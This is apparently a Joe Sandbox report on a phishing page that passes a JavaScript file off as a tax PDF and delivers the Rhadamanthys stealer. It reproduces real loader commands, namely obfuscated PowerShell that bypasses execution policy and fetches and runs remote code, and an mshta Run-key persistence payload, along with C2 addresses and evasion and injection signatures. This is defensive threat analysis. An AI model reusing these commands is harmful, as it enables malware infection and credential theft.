Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf

Overview

General Information

Sample URL:https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
Analysis ID:1638776
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
AI detected suspicious Javascript
Blob-based file download detected
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 3940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rundll32.exe (PID: 8140 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wscript.exe (PID: 5164 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • svchost.exe (PID: 2984 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RegSvcs.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • dllhost.exe (PID: 1480 cmdline: "C:\Windows\System32\dllhost.exe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • svchost.exe (PID: 7716 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 2708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
            • chrome.exe (PID: 7912 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9" MD5: E81F54E6C1129887AEA47E7D092680BF)
              • chrome.exe (PID: 4620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
            • msedge.exe (PID: 7464 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 2928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • RegSvcs.exe (PID: 7540 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
      • RegSvcs.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 1356 cmdline: dw20.exe -x -s 940 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • RegSvcs.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
      • RegSvcs.exe (PID: 7580 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 1156 cmdline: dw20.exe -x -s 936 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 4000 cmdline: dw20.exe -x -s 680 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 4816 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 6028 cmdline: dw20.exe -x -s 816 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
  • elevation_service.exe (PID: 4972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 2784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 3760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 8140 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • notepad.exe (PID: 7928 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\user-PC-20250307-1017.log MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ProcessId: 5164, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zevUsecure104
            Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 185.208.159.170, DestinationIsIpv6: false, DestinationPort: 2484, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 1480, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49775
            Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zevUsecure104
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7536, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2984, ProcessName: svchost.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ProcessId: 5164, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3940, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:34:44.797923+010020479051A Network Trojan was detected192.168.2.1649758216.58.206.33443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:34:09.778041+010028236061Exploit Kit Activity Detected45.223.19.158443192.168.2.1649735TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:36:00.075171+010028548242Potentially Bad Traffic185.208.159.1702484192.168.2.1649797TCP
            2025-03-14T18:36:08.952011+010028548242Potentially Bad Traffic185.208.159.1702484192.168.2.1649805TCP
            2025-03-14T18:36:15.642496+010028548242Potentially Bad Traffic185.208.159.1702484192.168.2.1649806TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:34:44.797923+010028032742Potentially Bad Traffic192.168.2.1649758216.58.206.33443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:35:17.171651+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.2.1649775TCP
            2025-03-14T18:36:00.075171+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.2.1649797TCP
            2025-03-14T18:36:08.952011+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.2.1649805TCP
            2025-03-14T18:36:15.642496+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.2.1649806TCP
            2025-03-14T18:36:21.220893+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.2.1649807TCP
            2025-03-14T18:36:28.807419+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.2.1649812TCP
            2025-03-14T18:36:34.666437+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.2.1649813TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T18:34:43.368533+010018100002Potentially Bad Traffic192.168.2.1649757216.58.206.33443TCP
            2025-03-14T18:34:44.797923+010018100002Potentially Bad Traffic192.168.2.1649758216.58.206.33443TCP
            2025-03-14T18:34:46.460713+010018100002Potentially Bad Traffic192.168.2.1649759185.166.143.49443TCP

            Joe Sandbox Signatures

            • Phishing
            • Compliance
            • Spreading
            • Software Vulnerabilities
            • Networking
            • Key, Mouse, Clipboard, Microphone and Screen Capturing
            • System Summary
            • Boot Survival
            • Hooking and other Techniques for Hiding and Protection
            • Malware Analysis System Evasion
            • Anti Debugging
            • HIPS / PFW / Operating System Protection Evasion
            • Language, Device and Operating System Detection
            • Stealing of Sensitive Information
            • Remote Access Functionality

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: 0.4.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be highly suspicious and likely malicious in nature.
            Source: 0.9.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of `eval`, `Function` constructor, and sending user data to unknown external domains are clear indicators of malicious intent. The overall level of obfuscation and lack of transparency make this script highly suspicious and potentially harmful.
            Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://securefilepro.netlify.app/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be engaging in malicious activities, such as redirecting to a suspicious domain and collecting user credentials. Given the combination of these behaviors, this script poses a high risk and should be further investigated.
            Source: 0.3.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a fake login page. The overall behavior is highly suspicious and poses a significant security risk.
            Source: 0.2.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be engaging in malicious activities, such as redirecting to a suspicious domain and collecting user credentials. Given the combination of these behaviors, this script poses a high risk and should be further investigated.
            Source: 0.12.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk indicators, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of an anonymous function with a long, obfuscated name and the presence of suspicious function calls suggest malicious intent. Without more context, this script should be considered a high-risk security threat.
            Source: 0.11.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The extensive use of encoded strings and multiple fallback domains, along with the script's overall suspicious nature, indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
            Source: 0.10.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be a malicious phishing attempt, collecting user credentials and redirecting to a suspicious domain. The overall behavior is highly suspicious and poses a significant risk to users.
            Source: 0.16..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://securefilepro.netlify.app/... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk indicators:1. Dynamic Code Execution: The script uses the `Function` constructor to execute remote or dynamically generated code, which is a common technique used by malware.2. Data Exfiltration: The script appears to be sending sensitive data (potentially including cookies, user information, or session identifiers) to an external server, which is a clear sign of malicious intent.3. Obfuscated Code/URLs: The script is heavily obfuscated, making it difficult to analyze and understand its true purpose. This is a common tactic used by malicious actors to hide their activities.Given the combination of these high-risk behaviors, the script poses a significant threat and should be considered as high-risk. Further investigation and analysis would be necessary to determine the exact nature and extent of the malicious activities.
            Source: https://www.securefilepro.com/assets/sfp.htmlHTTP Parser: No favicon
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.16:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.16:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.168.2.16:49807 -> 185.208.159.170:443 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49813 version: TLS 1.2
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
